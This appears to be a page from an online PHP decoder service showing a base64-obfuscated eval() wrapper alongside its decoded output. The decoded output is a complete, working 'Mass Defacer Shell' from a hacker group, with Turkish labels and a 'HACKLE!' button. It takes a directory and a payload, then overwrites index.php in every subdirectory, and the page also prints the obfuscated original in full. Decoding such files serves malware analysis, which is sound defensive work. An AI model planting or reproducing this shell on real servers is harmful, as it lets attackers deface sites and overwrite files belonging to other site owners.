Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode(" PD9waHAgCiAgCi8qIAogIApNYXNzIERlZmFjZSBTY3JpcHQgfCBLYXRpY..
Decoded Output download
?>b'<?php
/*
Mass Deface Script | Katib| PrivateHackers.Com
Adres => http://www.privatehackers.com/
*/
echo "<center><img src=\'http://i.hizliresim.com/JqgJ2o.gif\'></center>";
echo "<br>";
echo "<br>";
echo "<title>PrivateHackers Mass Defacer Shell</title>";
echo "<link href=\'http://fonts.googleapis.com/css?family=Electrolize\' rel=\'stylesheet\' type=\'text/css\'>";
echo "<body bgcolor=\'black\'><font color=\'white\'><font face=\'Electrolize\'>";
echo "<center><form method=\'POST\'></center>";
echo "<center>DIZIN: <input type=\'text\' name=\'base_dir\' size=\'40\' value=\'".getcwd ()."\'></center><br><br>";
echo "<center>DOSYA ADI : <input type=\'text\' name=\'file_name\' value=\'index.php\'></center><br><br>";
echo "<center>INDEX : <br><textarea style=\'width: 685px; height: 250px;\' name=\'index\'>INDEX KODLARINI BURAYA YAPISTIR</textarea></center><br>";
echo "<center><input type=\'submit\' value=\'HACKLE!\'></form></center>";
echo "<br>";
echo "<center>TheWayEnd - eL_CeWaD - Alp3r - st0rm - Darkb0x - Katib - Picasso</center><br>";
echo "<body bgcolor=\'black\'><font color=\'red\'><font face=\'Electrolize\'>";
echo "<center>PrivateHackers.Com - The Elite Hackers Group</center><br>";
if (isset ($_POST[\'base_dir\']))
{
if (!file_exists ($_POST[\'base_dir\']))
die ($_POST[\'base_dir\']." BULUNAMADI !<br>");
if (!is_dir ($_POST[\'base_dir\']))
die ($_POST[\'base_dir\']." DIZIN DEGIL !<br>");
@chdir ($_POST[\'base_dir\']) or die ("DIZIN ACILAMADI");
$files = @scandir ($_POST[\'base_dir\']) or die ("TAMAMDIR<br>");
foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$index = getcwd ()."/".$file."/".$_POST[\'file_name\'];
if (file_put_contents ($index, $_POST[\'index\']))
echo "$index    <span style=\'color: green\'>TAMAMDIR!</span><br>";
}
endforeach;
}
?>'
Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("
PD9waHAgCiAgCi8qIAogIApNYXNzIERlZmFjZSBTY3JpcHQgfCBLYXRpYnwgUHJpdmF0ZUhhY2tlcnMuQ29tCiAgCkFkcmVzID0+IGh0dHA6Ly93d3cucHJpdmF0ZWhhY2tlcnMuY29tLwogIAoqLyAKZWNobyAiPGNlbnRlcj48aW1nIHNyYz0naHR0cDovL2kuaGl6bGlyZXNpbS5jb20vSnFnSjJvLmdpZic+PC9jZW50ZXI+IjsgCmVjaG8gIjxicj4iOwplY2hvICI8YnI+IjsKZWNobyAiPHRpdGxlPlByaXZhdGVIYWNrZXJzIE1hc3MgRGVmYWNlciBTaGVsbDwvdGl0bGU+IjsgCmVjaG8gIjxsaW5rIGhyZWY9J2h0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PUVsZWN0cm9saXplJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz4iOyAKZWNobyAiPGJvZHkgYmdjb2xvcj0nYmxhY2snPjxmb250IGNvbG9yPSd3aGl0ZSc+PGZvbnQgZmFjZT0nRWxlY3Ryb2xpemUnPiI7IAplY2hvICI8Y2VudGVyPjxmb3JtIG1ldGhvZD0nUE9TVCc+PC9jZW50ZXI+IjsgCmVjaG8gIjxjZW50ZXI+RElaSU46IDxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdiYXNlX2Rpcicgc2l6ZT0nNDAnIHZhbHVlPSciLmdldGN3ZCAoKS4iJz48L2NlbnRlcj48YnI+PGJyPiI7IAplY2hvICI8Y2VudGVyPkRPU1lBIEFESSA6IDxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdmaWxlX25hbWUnIHZhbHVlPSdpbmRleC5waHAnPjwvY2VudGVyPjxicj48YnI+IjsgCmVjaG8gIjxjZW50ZXI+SU5ERVggOiA8YnI+PHRleHRhcmVhIHN0eWxlPSd3aWR0aDogNjg1cHg7IGhlaWdodDogMjUwcHg7JyBuYW1lPSdpbmRleCc+SU5ERVggS09ETEFSSU5JIEJVUkFZQSBZQVBJU1RJUjwvdGV4dGFyZWE+PC9jZW50ZXI+PGJyPiI7IAplY2hvICI8Y2VudGVyPjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdIQUNLTEUhJz48L2Zvcm0+PC9jZW50ZXI+IjsgCmVjaG8gIjxicj4iOwplY2hvICI8Y2VudGVyPlRoZVdheUVuZCAtIGVMX0NlV2FEIC0gQWxwM3IgLSBzdDBybSAtIERhcmtiMHggLSBLYXRpYiAtIFBpY2Fzc288L2NlbnRlcj48YnI+IjsKZWNobyAiPGJvZHkgYmdjb2xvcj0nYmxhY2snPjxmb250IGNvbG9yPSdyZWQnPjxmb250IGZhY2U9J0VsZWN0cm9saXplJz4iOwplY2hvICI8Y2VudGVyPlByaXZhdGVIYWNrZXJzLkNvbSAtIFRoZSBFbGl0ZSBIYWNrZXJzIEdyb3VwPC9jZW50ZXI+PGJyPiI7CiAgCmlmIChpc3NldCAoJF9QT1NUWydiYXNlX2RpciddKSkgCnsgCiAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyAoJF9QT1NUWydiYXNlX2RpciddKSkgCiAgICAgICAgICAgICAgICBkaWUgKCRfUE9TVFsnYmFzZV9kaXInXS4iIEJVTFVOQU1BREkgITxicj4iKTsgCiAgCiAgICAgICAgaWYgKCFpc19kaXIgKCRfUE9TVFsnYmFzZV9kaXInXSkpIAogICAgICAgICAgICAgICAgZGllICgkX1BPU1RbJ2Jhc2VfZGlyJ10uIiBESVpJTiBERUdJTCAhPGJyPiIpOyAKICAKICAgICAgICBAY2hkaXIgKCRfUE9TVFsnYmFzZV9kaXInXSkgb3IgZGllICgiRElaSU4gQUNJTEFNQURJIik7IAogIAogICAgICAgICRmaWxlcyA9IEBzY2FuZGlyICgkX1BPU1RbJ2Jhc2VfZGlyJ10pIG9yIGRpZSAoIlRBTUFNRElSPGJyPiIpOyAKICAKICAgICAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpOiAKICAgICAgICAgICAgICAgIGlmICgkZmlsZSAhPSAiLiIgJiYgJGZpbGUgIT0gIi4uIiAmJiBAZmlsZXR5cGUgKCRmaWxlKSA9PSAiZGlyIikgCiAgICAgICAgICAgICAgICB7IAogICAgICAgICAgICAgICAgICAgICAgICAkaW5kZXggPSBnZXRjd2QgKCkuIi8iLiRmaWxlLiIvIi4kX1BPU1RbJ2ZpbGVfbmFtZSddOyAKICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzICgkaW5kZXgsICRfUE9TVFsnaW5kZXgnXSkpIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIiRpbmRleCZuYnNwJm5ic3AmbmJzcCZuYnNwPHNwYW4gc3R5bGU9J2NvbG9yOiBncmVlbic+VEFNQU1ESVIhPC9zcGFuPjxicj4iOyAKICAgICAgICAgICAgICAgIH0gCiAgICAgICAgZW5kZm9yZWFjaDsgCn0gCiAgCj8+")); ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | fd55072c37fdc815b0387df12b2d7367 |
Eval Count | 1 |
Decode Time | 92 ms |